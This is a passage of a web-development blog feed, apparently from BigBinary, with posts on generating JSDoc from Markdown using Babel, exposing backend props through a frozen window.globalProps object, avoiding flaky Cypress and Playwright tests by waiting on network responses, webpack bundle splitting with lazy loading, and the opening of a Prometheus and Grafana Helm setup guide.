class="language-js">import fs from &quot;fs&quot;;
import path from &quot;path&quot;;
import _generate from &quot;@babel/generator&quot;;
import _traverse from &quot;@babel/traverse&quot;;
import * as babelTypes from &quot;@babel/types&quot;;

const traverse
= _traverse.default;
const generate = _generate.default;

const buildJsdoc = () =&gt; {
  const fileNamesInsideDocs = getFileNameList(path.resolve(DOCS_FOLDER_NAME));
  const typeFileNames = fs.readdirSync(path.resolve(TYPES_FOLDER_NAME));
  syncTypeFiles(EXPORTED_TYPES_FOLDER_NAME);

  const entityTitleToDescMapOfAllFiles = {};
  fileNamesInsideDocs.forEach(docFileName =&gt; {
    const fileContent = getFileContent(docFileName);
    const markdownAST = parseMarkdown(fileContent);
    buildEntityTitleToEntityDescMap(
      markdownAST.children,
      entityTitleToDescMapOfAllFiles
    );
  });

  typeFileNames.forEach(typeFileName =&gt; {
    const typeFileContent = getFileContent(
      path.join(EXPORTED_TYPES_FOLDER_NAME, typeFileName)
    );
    const typeFileAST = parseTypeFile(typeFileContent);
    typeFileTraverser({
      typeFileName: `${EXPORTED_TYPES_FOLDER_NAME}/${typeFileName}`,
      typeFileAST,
      entityTitleToDescMapOfAllFiles,
      babelTraverse: traverse,
      babelCodeGenerator: generate,
      babelTypes,
    });
  });

  console.log(&quot;Successfully added JSDoc comments to type files.&quot;);
};</code></pre><p>Let's dive deep into the above snippet to understand how the JSDoc generation script works.</p><h3>Initial Setup and Imports</h3><p>The script starts with essential imports and variable initializations. This section sets up the necessary tools and libraries to work with the file system and Abstract Syntax Trees (ASTs).</p><pre><code class="language-js">import fs from &quot;fs&quot;;
import path from &quot;path&quot;;
import _generate from &quot;@babel/generator&quot;;
import _traverse from &quot;@babel/traverse&quot;;
import * as babelTypes from &quot;@babel/types&quot;;

const traverse = _traverse.default;
const generate = _generate.default;</code></pre><h4>Gathering File Information</h4><p>We created a <code>buildJsdoc</code> function to encapsulate the JSDoc generation process. The <code>buildJsdoc</code> function begins by collecting file names from the documentation (<code>DOCS_FOLDER_NAME</code>) and type definition (<code>TYPES_FOLDER_NAME</code>) folders. It then copies the type definition files to <code>EXPORTED_TYPES_FOLDER_NAME</code>.</p><pre><code class="language-js">const fileNamesInsideDocs = getFileNameList(path.resolve(DOCS_FOLDER_NAME));
const typeFileNames = fs.readdirSync(path.resolve(TYPES_FOLDER_NAME));
syncTypeFiles(EXPORTED_TYPES_FOLDER_NAME); // copying the files</code></pre><h4>Building Entity Descriptions Map</h4><p>The script parses the Markdown documentation files to construct a map linking entity titles to their descriptions. This map serves as a bridge between the documentation and the type definitions. We use the <code>unified</code> package and the <code>remarkParse</code> plugin for parsing Markdown.</p><pre><code class="language-js">const entityTitleToDescMapOfAllFiles = {};

fileNamesInsideDocs.forEach(docFileName =&gt; {
  const fileContent = getFileContent(docFileName);
  const markdownAST = parseMarkdown(fileContent);
  buildEntityTitleToEntityDescMap(
    markdownAST.children,
    entityTitleToDescMapOfAllFiles
  );
});</code></pre><h4>Updating Type Definitions</h4><p>Next, the script traverses the AST of each type definition file. For each entity, it finds the corresponding description from the map and adds it to the type definition file.
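</p><p>To make that transformation concrete, here is a simplified, AST-free sketch of the idea: take a description recovered from Markdown and prepend it as a JSDoc block to a type declaration. The helpers <code>toJsdocComment</code> and <code>prependJsdoc</code> are hypothetical illustrations; the actual script performs this step on Babel AST nodes rather than raw strings.</p>

```javascript
// Hypothetical, string-based illustration of the JSDoc-prepending step.
// The real script operates on Babel ASTs; these helpers are not part of it.

// Wrap a plain-text description into a JSDoc comment block.
const toJsdocComment = description =>
  ["/**", ...description.split("\n").map(line => ` * ${line}`), " */"].join("\n");

// Prepend the generated JSDoc comment to a type declaration string.
const prependJsdoc = (typeDeclaration, description) =>
  `${toJsdocComment(description)}\n${typeDeclaration}`;

const result = prependJsdoc(
  "export declare const noop: () => void;",
  "A function that does nothing.\n@example noop();"
);
```

<p>Here, <code>result</code> holds the JSDoc block immediately followed by the declaration, which is what the editor tooltip ultimately picks up.</p><p>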
The <code>typeFileTraverser</code> function traverses the AST of a type definition file, looking for <code>ExportNamedDeclaration</code> nodes. It then prepends the corresponding JSDoc comment to each node.</p><pre><code class="language-js">typeFileNames.forEach(typeFileName =&gt; {
  const typeFileContent = getFileContent(
    path.join(EXPORTED_TYPES_FOLDER_NAME, typeFileName)
  );
  const typeFileAST = parseTypeFile(typeFileContent);
  typeFileTraverser({
    typeFileName: `${EXPORTED_TYPES_FOLDER_NAME}/${typeFileName}`,
    typeFileAST,
    entityTitleToDescMapOfAllFiles,
    babelTraverse: traverse,
    babelCodeGenerator: generate,
    babelTypes,
  });
});</code></pre><p>The script concludes by logging a success message, indicating the completion of the JSDoc generation process.</p><p>Once everything was set up and released, we were able to access both types and documentation from the code editor itself.</p><p><img src="/blog_images/2024/jsdoc-generation/vs-code-docs.png" alt="VS Code showing the types and docs"></p><h2>Conclusion</h2><p>By leveraging the power of type definitions and JSDoc comments, we were able to provide easy access to documentation, significantly enhance the developer experience, and streamline the development process. The automated generation of JSDoc comments from Markdown documentation further optimized our workflow, ensuring clarity and consistency while eliminating redundancy.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using globalProps to make it easier to share data in React.js applications]]></title>
       <author><name>Deepak Jose</name></author>
      <link href="https://www.bigbinary.com/blog/global-props"/>
      <updated>2024-02-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/global-props</id>
<content type="html"><![CDATA[<h3>Our technology stack for Neeto</h3><p>We are building <a href="https://neeto.com">neeto</a>, and our technology stack is quite simple. On the front end, we use React.js. On the backend, we use Ruby on Rails, PostgreSQL, Redis and Sidekiq.</p><p>The term <code>globalProps</code> might not ring a bell for most people. It was coined by the BigBinary team for our internal use. <code>globalProps</code> is data that is directly retrieved from our backend and assigned to the browser's global object, <code>window</code>. To view the global props, we can type <code>globalProps</code> in the browser console, which prints out useful information set by the backend service.</p><p><img alt="globalProps in the browser console" src="/blog_images/2024/global-props/global-props-console.png"></p><h3>How is <code>globalProps</code> implemented</h3><p>To understand where <code>globalProps</code> came from and how it works, we need to examine the <a href="https://github.com/reactjs/react-rails">React-Rails</a> gem. It uses the Ruby on Rails asset pipeline to automatically transform JSX into Rails-compatible assets using the Ruby Babel transpiler.</p><p>The <code>react_component</code> helper method takes a component name as the first argument, <code>props</code> as the second argument and a list of HTML attributes as the third argument. The documentation has more <a href="https://github.com/reactjs/react-rails/blob/master/docs/view-helper.md">details</a>.</p><pre><code class="language-erb">&lt;%= react_component(&quot;App&quot;, get_client_props, { class: &quot;root-container&quot; }) %&gt;</code></pre><h3>Limitations of the default behavior</h3><p>In the <code>react-rails</code> gem, the hash is set as the props of the component specified in the <code>react_component</code> method by default. In the example above, the hash returned by the <code>get_client_props</code> method is passed as props to the <code>App</code> component on the front end.</p><p>The limitation of this approach is that we need to pass <code>globalProps</code> down through all the components via prop drilling or React Context.</p><h5>The concept of nanos</h5><p>At neeto, anything that does not contain product-specific business logic and can be extracted into a reusable tool is extracted into an independent package. We call them nanos.</p><p>You can read more about it in our blog on how <a href="https://blog.neeto.com/p/nanos-make-neeto-better">nanos make Neeto better</a>.</p><h5>Limitations in accessing the props from nanos and utility functions</h5><p>The issue with the above approaches to handling the props is that they won't be directly available in utility functions or nanos. We explicitly need to pass the props as arguments to utility functions after prop drilling. If we use React Context, it can only be accessed in React components or hooks; it cannot be accessed in utility functions. Also, we cannot directly obtain a reference to the Context within the nanos.</p><h5>Why we didn't choose environment variables</h5><p>Some of the variables inside <code>globalProps</code> are environment variables, which are usually accessed as <code>process.env.VARIABLE_NAME</code>. If we set environment variables, they will be hardcoded into the JavaScript bundle at the time of bundling. This implies that whenever we need to change an environment variable, we must trigger a redeployment.</p><h3>The solution is <code>globalProps</code></h3><p>The advantage of <code>globalProps</code> over these approaches is that it's accessible everywhere, since it lives in the browser's global object, <code>window</code>.
All the nanos and utility functions that we integrate into the application have seamless access to the props without any extra wiring.</p><h3>Seeding the hash from the backend into the browser's global object, window</h3><p>Seeding the hash from the backend into the browser's global object is accomplished using the above-mentioned helper method, <code>react_component</code>. As we discussed earlier, an HTML node is created that contains a <code>data-react-class</code> attribute representing the component name and a <code>data-react-props</code> attribute representing the hash we passed from the backend as an HTML-encoded string.</p><p><img alt="Inspecting the root container element in the console" src="/blog_images/2024/global-props/element-console.png"></p><h3>Decode the HTML-encoded string into a JavaScript object</h3><p>The next step is to decode the HTML-encoded string and parse it into a JavaScript object. The hash is read from the <code>root-container</code> HTML node and parsed into a JavaScript object.</p><pre><code class="language-js">const rootContainer = document.getElementsByClassName(&quot;root-container&quot;)[0];
const reactProps = JSON.parse(rootContainer?.dataset?.reactProps || &quot;{}&quot;);</code></pre><h3>Convert the case of the keys in the object</h3><p>The JavaScript object that we have obtained has its keys in snake case. We will convert them into camel case using the helper method <a href="https://github.com/bigbinary/neeto-cist/blob/b4375525ac5ffbb0aeb6548cc64d3970379493ee/docs/pure/objects.md#keystocamelcase">keysToCamelCase</a>.</p><p>We convert the case because React prefers camel case keys, while Rails prefers snake case keys.</p><pre><code class="language-js">const globalProps = keysToCamelCase(reactProps);</code></pre><h3>Deep-freeze the global props</h3><p>Additionally, we take an extra step to deep-freeze the global props object, ensuring immutability.
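</p><p>As a rough sketch, a recursive deep freeze can be implemented as below. This is a hypothetical illustration, not the actual <code>deepFreezeObject</code> implementation from neeto-cist:</p>

```javascript
// Hypothetical sketch of a deep-freeze helper; the real implementation
// lives in neeto-cist as deepFreezeObject.
const deepFreeze = object => {
  // Freeze nested objects first, then freeze the object itself.
  Object.values(object).forEach(value => {
    if (value !== null && typeof value === "object" && !Object.isFrozen(value)) {
      deepFreeze(value);
    }
  });

  return Object.freeze(object);
};

const frozenProps = deepFreeze({ appName: "neeto", user: { role: "admin" } });
```

<p>Once frozen this way, assignments to nested keys such as <code>frozenProps.user.role</code> are silently ignored (or throw in strict mode), keeping the seeded data intact.</p><p>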
The helper function used here is <a href="https://github.com/bigbinary/neeto-cist/blob/b4375525ac5ffbb0aeb6548cc64d3970379493ee/docs/pure/objects.md#deepfreezeobject">deepFreezeObject</a>. This prevents modifications to the global props from within the product and thus ensures data integrity when working with different nanos. All these steps are performed before the initial rendering of the React component.</p><pre><code class="language-js">window.globalProps = globalProps;
deepFreezeObject(window.globalProps);</code></pre><p>Let's see the final code block that seeds the hash from the backend into the browser's global object.</p><pre><code class="language-js">export default function initializeGlobalProps() {
  const rootContainer = document.getElementsByClassName(&quot;root-container&quot;);
  const htmlEncodedReactProps = rootContainer[0]?.dataset?.reactProps;
  const reactProps = JSON.parse(htmlEncodedReactProps || &quot;{}&quot;);
  const globalProps = keysToCamelCase(reactProps);

  window.globalProps = globalProps;
  deepFreezeObject(window.globalProps);
}</code></pre><p>If we take a closer look at the content of <code>globalProps</code>, we can see that it carries a lot of data. As discussed earlier, this data is useful to other nanos. Some of the data being passed includes appName, honeyBadgerApiKey, organization, user info, etc.</p><p><img alt="globalProps in the browser console" src="/blog_images/2024/global-props/global-props-console.png"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Tackling Flaky Tests With Cypress and Playwright through Network Synchronization]]></title>
       <author><name>Shreya Kurian</name></author>
      <link href="https://www.bigbinary.com/blog/tackling-flaky-tests-in-cypress-and-playwright"/>
      <updated>2024-01-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/tackling-flaky-tests-in-cypress-and-playwright</id>
<content type="html"><![CDATA[<p>Flaky tests are a common challenge in end-to-end testing. There are many types of flaky tests. In this blog, we will cover the flakiness that arises when UI actions take place before the API response has arrived. We'll see how <a href="https://docs.cypress.io/">Cypress</a> and <a href="https://playwright.dev/">Playwright</a> address these challenges.</p><h2>Taming flakiness in Cypress</h2><p>In Cypress, the <code>cy.wait()</code> command is used to pause the test execution. Let's explore how Cypress handles flakiness with the <code>cy.intercept()</code> and <code>cy.wait()</code> commands.</p><p>Let's consider an example of an online shopping application where a new order is created when we click the submit button.</p><pre><code class="language-javascript">cy.intercept(&quot;/orders/*&quot;).as(&quot;fetchOrder&quot;);
cy.get(&quot;[data-cy='submit']&quot;).click();
cy.wait(&quot;@fetchOrder&quot;);</code></pre><p>Let's understand what the above example is trying to achieve, line by line.</p><p><code>cy.intercept(&quot;/orders/*&quot;).as(&quot;fetchOrder&quot;)</code>: Sets up a network interception. It intercepts any network request that matches the pattern <code>/orders/</code> and gives it a unique alias, <code>fetchOrder</code>. This allows us to capture and control the network request for further testing.</p><p><code>cy.get(&quot;[data-cy='submit']&quot;).click()</code>: Locates an HTML element with the attribute <code>data-cy</code> set to <code>submit</code> and simulates a click on it.</p><p><code>cy.wait(&quot;@fetchOrder&quot;)</code>: Instructs Cypress to wait until the intercepted network request with the alias <code>fetchOrder</code> is completed before proceeding with the test.</p><p>The <code>cy.wait()</code> command involves two distinct phases of waiting.</p><p><strong>Phase 1:</strong> The command waits for a matching request to be sent from the browser.
In the provided example, the wait command pauses execution until a request with the URL pattern <code>/orders/</code> is initiated by the browser. This waiting period continues until a matching request is found. If the command fails to identify such a request within the configured request timeout, a timeout error is triggered. Upon successfully detecting the matching request, the second phase kicks in.</p><p><strong>Phase 2:</strong> In this phase, the command waits until the server responds. If the anticipated response fails to arrive within the configured response timeout, a timeout error is thrown. In the above example, the wait command in this phase will wait for the response of the request aliased as <code>fetchOrder</code>.</p><p>This dual-layered waiting mechanism significantly contributes to the reliability of tests. It ensures a synchronized interaction between UI actions and server responses, facilitating more robust and dependable test scenarios.</p><h3>Managing multiple responses</h3><p>Consider a situation where a user adds a product to the cart, thus initiating two concurrent requests. The first request adds the product to the cart, while the second request fetches the updated list of orders.
To ensure the synchronization of these asynchronous actions, we must wait for both requests to be successfully completed before continuing with the test execution.</p><p>Cypress provides the <code>times</code> property in the <code>cy.intercept()</code> options, offering control over how many times a request with a particular pattern should be intercepted.</p><pre><code class="language-javascript">cy.intercept({ url: &quot;/orders/*&quot;, times: 2 }).as(&quot;fetchOrders&quot;);
cy.get(&quot;[data-cy='submit']&quot;).click();
cy.wait([&quot;@fetchOrders&quot;, &quot;@fetchOrders&quot;]);</code></pre><p>Let's decode the above example line by line.</p><p><code>cy.intercept({ url: &quot;/orders/*&quot;, times: 2 }).as(&quot;fetchOrders&quot;)</code>: Specifies that the interception should match requests with the pattern <code>/orders/</code> and limits the interception to exactly two occurrences.</p><p><code>cy.get(&quot;[data-cy='submit']&quot;).click()</code>: Locates an HTML element with the attribute <code>data-cy</code> set to <code>submit</code> and simulates a click on it.</p><p><code>cy.wait([&quot;@fetchOrders&quot;, &quot;@fetchOrders&quot;])</code>: Ensures that the test waits until the two intercepted requests with the alias <code>fetchOrders</code> are completed before moving on to the next steps.</p><h2>Taming Flakiness in Playwright</h2><p>Playwright offers page methods like <code>waitForRequest</code> and <code>waitForResponse</code> to address synchronization challenges between UI actions and API responses.
Both these methods return a promise that resolves when a request or response matching the pattern is found, and they throw an error if the configured timeout is exceeded.</p><p>Let's consider the same example of an online shopping application where a new order is created when we click the submit button.</p><pre><code class="language-javascript">await page.getByRole(&quot;button&quot;, { name: &quot;Submit&quot; }).click();
await page.waitForResponse(response =&gt; response.url().includes(&quot;/orders/&quot;));</code></pre><p>In the above example, <code>page.waitForResponse</code> waits for a network response that matches the URL pattern <code>/orders/</code> after clicking the submit button.</p><p>Even though the above example seems simple, there is a chance of flakiness here. That is because the API might respond before Playwright starts waiting for it. This might happen for two reasons:</p><ol><li>The API is very fast.</li><li>External factors delay the test script.</li></ol><p>Such situations could lead to timeouts and test failures.</p><p>To address this issue, it's important to coordinate the promises so that the <code>waitForResponse</code> command runs at the same time as the UI actions. The following example illustrates this approach.</p><pre><code class="language-javascript">const fetchOrder = page.waitForResponse(response =&gt;
  response.url().includes(&quot;/orders/&quot;)
);
await page.getByRole(&quot;button&quot;, { name: &quot;Submit&quot; }).click();
await fetchOrder;</code></pre><p>In the above example, the page starts watching for responses matching the specific URL pattern, <code>/orders/</code>, before clicking the submit button. The <code>waitForResponse</code> command returns a promise, which we have saved into the variable <code>fetchOrder</code>. After performing the click action in the following line, we wait for the promise stored in <code>fetchOrder</code> to resolve. When it resolves, it signifies that the response has been received.
This enables us to move on to the next assertion without facing any reliability issues.</p><h3>Managing Multiple Responses</h3><p>Let's consider a scenario similar to the one explained for Cypress, where we have to manage multiple responses: one to add a product and another to fetch the updated list of products.</p><p>To wait for the completion of two requests matching the same URL pattern, consider the following approach.</p><pre><code class="language-javascript">const fetchOrders = Promise.all(
  [...new Array(2)].map(() =&gt;
    page.waitForResponse(response =&gt; response.url().includes(&quot;/orders/&quot;))
  )
);
await page.getByRole(&quot;button&quot;, { name: &quot;Submit&quot; }).click();
await fetchOrders;</code></pre><p>In the above example, we start waiting for two responses with the pattern <code>/orders/</code> using <code>Promise.all</code>. The flaw in the above code is that the two <code>waitForResponse</code> calls run in parallel and end up tracking the exact same API request. In simpler terms, it's like waiting for just one request, as both of them wait for the completion of the same API.</p><p>To solve this problem, it's important to improve the code by keeping track of the resolved APIs.
Let's see how to achieve that.</p><pre><code class="language-javascript">const trackedResponses = [];

const fetchOrders = Promise.all(
  [...new Array(2)].map(() =&gt;
    page.waitForResponse(response =&gt; {
      const requestId = response.headers()?.[&quot;x-request-id&quot;];
      if (
        response.url().includes(&quot;/orders/&quot;) &amp;&amp;
        !trackedResponses.includes(requestId)
      ) {
        trackedResponses.push(requestId);
        return true;
      }

      return false;
    })
  )
);
await page.getByRole(&quot;button&quot;, { name: &quot;Submit&quot; }).click();
await fetchOrders;</code></pre><p>In the above example, we have initialized a new variable, <code>trackedResponses</code>, with an empty array, intended to store the unique identifiers (request IDs) of resolved APIs. The response predicate checks whether the URL includes the substring <code>/orders/</code> and whether the request ID has not already been recorded in the <code>trackedResponses</code> array. If both conditions are satisfied, it adds the request ID to the <code>trackedResponses</code> array and returns <code>true</code>, indicating that this is a response we were waiting for. This approach prevents the same response from being matched more than once.</p><h2>Conclusion</h2><p>By understanding and implementing these synchronization techniques in Cypress and Playwright, we can significantly enhance the robustness and reliability of end-to-end tests, ultimately contributing to a more stable and trustworthy testing suite.</p><h2>References</h2><p><a href="https://docs.cypress.io/api/commands/intercept">cy.intercept</a></p><p><a href="https://docs.cypress.io/api/commands/wait">cy.wait</a></p><p><a href="https://playwright.dev/docs/api/class-page#page-wait-for-request">page.waitForRequest</a></p><p><a href="https://playwright.dev/docs/api/class-page#page-wait-for-response">page.waitForResponse</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[Bundle Splitting]]></title>
       <author><name>Labeeb Latheef</name></author>
      <link href="https://www.bigbinary.com/blog/bundle-splitting"/>
      <updated>2024-01-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/bundle-splitting</id>
<content type="html"><![CDATA[<h3>Loading JavaScript assets faster by bundling</h3><p>When we write code, we split parts of it into different files to manage complexity. However, the web application requires all of its JavaScript files in order to function properly. On the surface, it might seem like loading all the separate JavaScript files is easy, but it gets very complicated very fast.</p><p>Let's assume that we have three different JavaScript files in our codebase that we are referencing directly from the HTML.</p><pre><code class="language-html">&lt;head&gt;
  &lt;script src=&quot;/assets/js/script_1.js&quot;&gt;&lt;/script&gt;
  &lt;script src=&quot;/assets/js/script_2.js&quot;&gt;&lt;/script&gt;
  &lt;script src=&quot;/assets/js/script_3.js&quot;&gt;&lt;/script&gt;
&lt;/head&gt;</code></pre><p>Now, what if we find that <code>script_1.js</code> has a dependency on <code>script_2.js</code>, and <code>script_2.js</code> needs to be loaded first? We will have to rearrange the ordering such that all the dependencies are satisfied. Doing this iteratively for hundreds of files can quickly become a nightmare.</p><p>One could ask why we can't write all the code in a single JavaScript file to avoid this dependency issue. Modern web applications require a lot of JavaScript code, so keeping all of it in a single handwritten file is just not practical.</p><p>Another issue with referencing hundreds of JavaScript files is that browsers can fetch only four to eight files at a time. If we have hundreds of JavaScript files, the browser will take a long time to load them all.</p><p>The solution to all these problems is packing all those JavaScript files into one large file that can be downloaded in one shot. This large file will also have all the code in the right order, satisfying the dependency requirement. This process of packing all the JavaScript files into one big file is called <strong>bundling</strong>.
We can use tools like <a href="https://webpack.js.org/">Webpack</a> or <a href="https://rollupjs.org/">Rollup</a> to achieve bundling. The tools that help us achieve bundling are typically called <strong>bundlers</strong>.</p><p><img src="/blog_images/2024/bundle-splitting/single-bundle.png" alt="Single bundle"></p><p>When we use a bundler, we can keep our code in any hierarchy we want for development purposes. After all, the bundler will figure out the dependencies. So is the bundler's job only to stitch all the JavaScript files into one large file in the right order?</p><p>No. During bundling, a bundler can be configured to apply different transformations and optimizations to our source code. It allows us to write our code using modern syntax while transforming it to a format more commonly supported by different browser implementations during the bundling process. Another common task is the minification of our JavaScript files by removing all unwanted whitespace characters and comments.</p><p>We have discussed only a few optimizations and transformations here. Bundlers support many more.</p><p><img src="/blog_images/2024/bundle-splitting/bundler-sample.png" alt="Sample bundler output"></p><h3>Loading JavaScript files faster by bundle splitting</h3><p>Bundle splitting is the process of splitting this single bundle into multiple chunks. We just talked about the advantages of bundling, so why are we now talking about bundle splitting? As we will see, there are some advantages to splitting the bundle, as long as it's done strategically.</p><p>Most commonly, bundle splitting splits the code into three separate chunks. A <code>vendor</code> chunk holds all the code inside the <em>node_modules</em> folder, an <code>application</code> chunk holds all the code we have written, and a <code>runtime</code> chunk is added by the bundler to enable all the other chunks to be loaded properly.
If we are using webpack to bundle our application, the default bundle splitting configuration can be found in the <a href="https://webpack.js.org/plugins/split-chunks-plugin/#defaults">documentation</a>. If we use CRA (Create React App) to scaffold our application, an optimal configuration is already in place.</p><p>There are different ways in which we can benefit from this process. Thanks to HTTP/2, browsers are now able to fetch resources from the server in parallel. Because of this, instead of waiting for a single huge bundle to load, the browser can load multiple smaller chunks in parallel for a better load time.</p><p><img src="/blog_images/2024/bundle-splitting/multiple-chunks.png" alt="Multiple chunks"></p><p>On top of that, we can ask the browser to cache a specific JavaScript file. This will make the application load those JavaScript files faster the next time around. Usually, the contents of the <code>vendor</code> chunk are not expected to change frequently and can be reused from the browser cache, cutting down on load time significantly. This is usually achieved by encoding the chunk name with the content hash. This tells the browser: &quot;If the hash changed, assume the content changed, ignore the cache, and fetch the updated chunk from the server&quot;.</p><pre><code class="language-javascript">// webpack.config.js
module.exports = {
  //...
  output: {
    filename: &quot;[contenthash].js&quot;,
  },
};</code></pre><p>Now the question is: what factors determine whether the bundle should be split into multiple chunks? One such factor is the file location. As mentioned above, files from the <em>node_modules</em> folder are generally kept in the <code>vendor</code> chunk while the application code goes into the <code>application</code> chunk.
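</p><p>As a minimal sketch (illustrative, not Neeto's actual configuration), that location-based split can be expressed in webpack like this:</p>

```javascript
// webpack.config.js (a minimal sketch, not a production config)
module.exports = {
  optimization: {
    // Emit webpack's runtime as its own chunk so that the application and
    // vendor chunks can be cached independently of the loading logic.
    runtimeChunk: "single",
    splitChunks: {
      chunks: "all",
      cacheGroups: {
        // Everything imported from node_modules goes into a "vendor" chunk.
        vendor: {
          test: /[\\/]node_modules[\\/]/,
          name: "vendor",
        },
      },
    },
  },
};
```

<p>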
We can also specify a maximum chunk size in the bundler configuration, which creates an additional chunk whenever the current chunk exceeds the size limit.</p><pre><code class="language-javascript">// webpack.config.js
module.exports = {
  //...
  optimization: {
    splitChunks: {
      maxSize: 15000000, // 15MB in static size, before compression
    },
  },
};</code></pre><p>We can take this a step further by loading only those chunks that are necessary to render the content that should be made visible to the user. Other chunks are loaded only when they are truly needed. This is also called lazy loading.</p><p>For example, suppose we have an application that offers two pages: a Dashboard page and a Settings page. A user, after logging in, directly lands on the Dashboard page. Normally, the loaded JavaScript bundle will also include code related to the Settings page, which is not required to render the current Dashboard page. The Settings code just sits there, waiting for the user to navigate to the Settings page.</p><p><img src="/blog_images/2024/bundle-splitting/all-parts-in-single-bundle.png" alt="All components in single bundle"></p><p>This is the problem that lazy loading attempts to resolve. The easiest way to achieve this is to import the code during runtime using an inline import statement. React offers a wrapper for integrating lazy-loaded components using <a href="https://react.dev/reference/react/Suspense">Suspense</a>.</p><pre><code class="language-jsx">import React, { Suspense } from &quot;react&quot;;

const LazyComponent = React.lazy(() =&gt; import(&quot;./LazyComponent&quot;));

const Component = () =&gt; (
  &lt;Suspense fallback={&lt;div&gt;Loading LazyComponent&lt;/div&gt;}&gt;
    &lt;LazyComponent /&gt;
  &lt;/Suspense&gt;
);</code></pre><p>This means that during the bundling process, whenever a lazy import is encountered by the bundler, the code in the required module is kept as a separate &quot;async&quot; chunk which is loaded only on demand. 
In the prior example, we can have the Settings component lazily imported so that when a user goes to the Dashboard page, the Settings-related code will not be part of the initial bundle, resulting in a lower initial bundle size.</p><p><img src="/blog_images/2024/bundle-splitting/split-parts-to-different-chunks.png" alt="Components split into different chunks"></p><p>We can verify the results using tools like <a href="https://github.com/webpack-contrib/webpack-bundle-analyzer">Bundle Analyzer Plugin</a> that allow us to visualize and inspect the size and contents of each chunk in the bundler output.</p><p>Lazy loading may seem very promising, and we may be tempted to split every part of the application into different chunks, expecting a more efficient loading experience. However, this may not always be the case. Unlike other methods, lazy loading requires careful evaluation of different parts of the application and their dependencies to determine which parts can be effectively lazy-loaded.</p><p>Let's bring back the above example. Suppose our Settings page requires API calls to load data and render the content. If the code for the Settings page is part of the same initial bundle, as soon as we navigate to the Settings page, the API requests are fired, data is fetched, and content is rendered. Note that the JavaScript code for the Settings page is already loaded, so the API call is made instantly.</p><p>Now, what if the Settings code was split into a different on-demand chunk and was not part of the initial bundle? When we navigate to the Settings page, the browser needs to fetch the Settings chunk from the server, execute it, send network requests, and then render the content. An additional delay is introduced here for fetching the chunk, which may add to the slowness. 
In a way, this brings down the benefits offered by a single-page application (SPA).</p><p>When splitting up the bundle for our product <a href="https://neetochat.com">NeetoChat</a>, we chose to split the Settings-related code into a separate, on-demand chunk. Settings was not a random choice. It took up a large part of the bundle, and one interesting property was that the Settings page didn't require data from the server to render. The Settings page contains a predefined set of category tiles that allow us to navigate to other settings-related pages.</p><p><img src="/blog_images/2024/bundle-splitting/chat-settings.png" alt="NeetoChat Settings"></p><p>For the reasons mentioned above, Settings appeared to be a good candidate for lazy loading, and therefore, all the related code was extracted into a few separate asynchronous bundles. After this change, when a user loads the dashboard page of NeetoChat, the loaded bundles do not contain code related to any of the Settings pages, thereby having a smaller overall initial asset size.</p><p>Later, when the user navigates to the Settings page, the related JavaScript chunks are fetched, and the UI is rendered immediately without the need for API data. From the Settings page, the user can choose any of the Settings categories to navigate to the inner pages. The inner pages require API data to render the content. However, the required JS assets are already loaded and available to execute as part of the last asset request on the landing page, thereby reducing the network latency.</p><p>For more fine-grained control over the lazy-loading implementation in our app, we are using the <a href="https://github.com/jamiebuilds/react-loadable">react-loadable</a> library. 
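</p><p>A rough sketch of how a react-loadable component is typically declared, following the library's documented <code>Loadable</code> API (the <code>./Settings</code> path and <code>Loading</code> component here are hypothetical, not NeetoChat's actual code):</p><pre><code class="language-jsx">import React from &quot;react&quot;;
import Loadable from &quot;react-loadable&quot;;

// Shown while the async chunk is being fetched over the network
const Loading = () =&gt; &lt;div&gt;Loading Settings&lt;/div&gt;;

// The dynamic import() tells the bundler to emit Settings as a separate chunk,
// fetched only when LoadableSettings is first rendered.
const LoadableSettings = Loadable({
  loader: () =&gt; import(&quot;./Settings&quot;),
  loading: Loading,
});</code></pre><p>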
The video below walks you through the bundle splitting process and results in the NeetoChat web application.</p><iframe width="560" height="315" src="https://www.youtube.com/embed/JW-CVXhXQmg" title="Bundle splitting in NeetoChat" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>]]></content>
    </entry><entry>
       <title><![CDATA[Setting up Prometheus and Grafana on Kubernetes using Helm]]></title>
       <author><name>Vishal Yadav</name></author>
      <link href="https://www.bigbinary.com/blog/prometheus-and-grafana-integration"/>
      <updated>2024-01-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/prometheus-and-grafana-integration</id>
      <content type="html"><![CDATA[<p>In this blog, we will learn how to set up Prometheus and Grafana on Kubernetes using Helm.</p><p><a href="https://prometheus.io/">Prometheus</a>, along with <a href="https://grafana.com/">Grafana</a>, is a highly scalable open-source monitoring framework for <a href="https://devopscube.com/docker-container-clustering-tools/">container orchestration platforms</a>. Prometheus probes the application and collects various data. It stores all this data in its time series database. Grafana is a visualization tool. It uses the data from the database to show the data that is meaningful to the user.</p><p>Both Prometheus and Grafana are gaining popularity in the <a href="https://devopscube.com/what-is-observability/">observability</a> space as they help with metrics and alerts. Learning to integrate them using Helm will allow us to monitor our Kubernetes cluster and troubleshoot problems easily. Furthermore, we can dive deep into our cluster's well-being and efficiency, focusing on resource usage and performance metrics within our Kubernetes environment.</p><p>We will also learn how to create a simple <a href="https://grafana.com/grafana/dashboards/">dashboard</a> on Grafana.</p><h2><strong>Why using Prometheus and Grafana for monitoring is good</strong></h2><p>Using Prometheus and Grafana for monitoring has many benefits:</p><ul><li><strong>Scalability:</strong> Both tools are highly scalable and can handle the monitoring needs of small to large Kubernetes clusters.</li><li><strong>Flexibility:</strong> They allow us to create custom dashboards tailored to our specific monitoring requirements.</li><li><strong>Real-time Monitoring:</strong> Prometheus provides real-time monitoring, helping us to quickly detect and respond to issues.</li><li><strong>Alerting:</strong> Prometheus enables us to set up alerts based on specific metrics, so we can be notified when issues arise.</li><li><strong>Data Visualization:</strong> Grafana offers powerful data 
